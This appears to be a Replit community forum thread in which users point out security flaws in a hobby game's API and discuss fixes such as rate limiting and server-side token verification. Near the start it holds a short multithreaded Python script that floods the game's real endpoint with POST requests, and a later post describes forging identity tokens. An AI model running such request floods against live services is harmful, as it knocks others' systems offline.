Also someone could probably takedown your api with something like this. Which is really just ddosing it. The only way I know to fix this is rate limiting and blocking IP’s that are making too many requests to your api.
import requests, threading
def attack():
while True:
print("running")
requests.post("https://ArrowFall-Server.bigminiboss.repl.co/person")
threads = []
for i in range(10): # ten threads
threads.append(threading.Thread(target=attack))
for thread in threads:
thread.start()
Oh the response code, 500, but I wasn’t trying to actually change anything, I just wanted to throw some errors
ooh, yeah your probably right… ughh, but the API requires lots of requests to function… argh…
also I can get a valid identity token by using the same process you use to create one and submitting that
really? UGHHHHHHH ARE YOU JOKING I thought the origin repl id prevented that…
EDIT: origin repl id meaning I check what the request’s repl id is, I thought that prevented it…
Well whenever someone who isn’t the owner (or invited) to the repl runs it, like me, replit basically makes a new version of the repl (as a security measure) so the repl id is completely different.
For example if you run os.environ["REPL_ID"]
you will see the id for that repl, but I was see a completely different id.
dang it, I found out how you do it
- ctrl +c
- ctrl + d
- copy paste functions
- make new token
EDIT: judging by the like, it appears this is true and you have done this and hacked it
1 Like
yeah repl identity will generate the origin repl id as if it was a hosted repl
Really? It doesn’t for me: Try running this repl and seeing if it says “Match!”. If I run it it does, but if I run it on an alt the repl identity is different. https://replit.com/@InvisibleOne/ENV-Test#main.py
yeah dang I think you need to run the code in my repl?
from json import loads
from os import environ as env
import subprocess
import dataclasses
REPLIT_CLI = env["REPLIT_CLI"]
@dataclasses.dataclass
class IdentityToken:
"""A Repl Identity token parsed into fields"""
replid: str
user: str
slug: str
aud: str
ephemeral: bool = False
origin: str = ""
originReplId: str = ""
def create_identity_token(audience: str, cmd: str = "replit") -> str:
"""Create an identity token addressed to the given audience."""
token = subprocess.check_output(
[cmd, "identity", "create", f"-audience={audience}"])
return token.decode("utf-8").strip()
def verify_identity_token(expected_audience: str,
token: str,
cmd: str = "replit") -> IdentityToken:
"""Verify the given identity token and decode it if verification passes."""
token = subprocess.check_output([
cmd,
"identity",
"verify",
f"-audience={expected_audience}",
f"-token={token}",
"-json",
])
return IdentityToken(**loads(token))
running verify_identity_token
will give you the correct id, it’s outlined here and to a lesser degree here for python
Yeah, any ENV’s are only in your repl, they hold completely different values if I run the code. Since (as far as I know) replit basically creates a new environment for me when I run your code (unless it’s a webserver)
Which is why if you run publish code that writes something to a TXT file, and I run that code, nobody else but me will see the changes to the file.
yes, I know this, but I’m pretty sure repl identity gets it to work? Maybe try using the one’s outlined in the blog?
Ok, I messed around with repl identity and I think the issue is you are verifying the identity in your “frontend” instead of your backend like you should (correct me if I’m wrong)
Try seeing if you can abuse this api:
“Front End”:
https://replit.com/@InvisibleOne/Token-Test#main.py
should output “{“verify” : True}” unless you fork it, then verify will be False
“Server”
https://replit.com/@InvisibleOne/Token-Test-Server#main.py
1 Like
Cool, but how did you maka a chat system that is laggless and updating at the same time? When I tried to creat a chat system it started lagging because of the threads.
bigminiboss will probably know better, but I’m assuming the code is just waiting for events and then updating, if you are constantly updated it will get super laggy.
yes, this is what it’s doing it checks new events every second but only updates the console when it receives a new message
Arrowfall is down currently, any explanation why?
The main dev, Overdrive, decided they found the project too taxing to be currently released as they were pressured into releasing it after grinding it for a month with about 60 hours total, and they were experiencing burnout. Therefore, they may re-release it after bug fixing, but they also may never release it again
2 Likes
Got it, thanks!
words so i can post this.